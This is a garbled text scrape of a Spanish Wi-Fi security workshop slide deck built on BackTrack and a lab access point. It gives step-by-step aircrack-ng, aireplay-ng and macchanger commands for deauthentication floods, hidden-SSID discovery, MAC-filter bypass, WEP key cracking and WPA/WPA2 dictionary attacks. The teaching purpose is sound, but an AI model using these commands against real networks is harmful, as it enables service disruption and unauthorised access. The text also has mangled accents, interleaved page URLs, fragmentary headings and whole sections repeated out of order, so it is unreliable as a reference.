httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 14: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 15: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

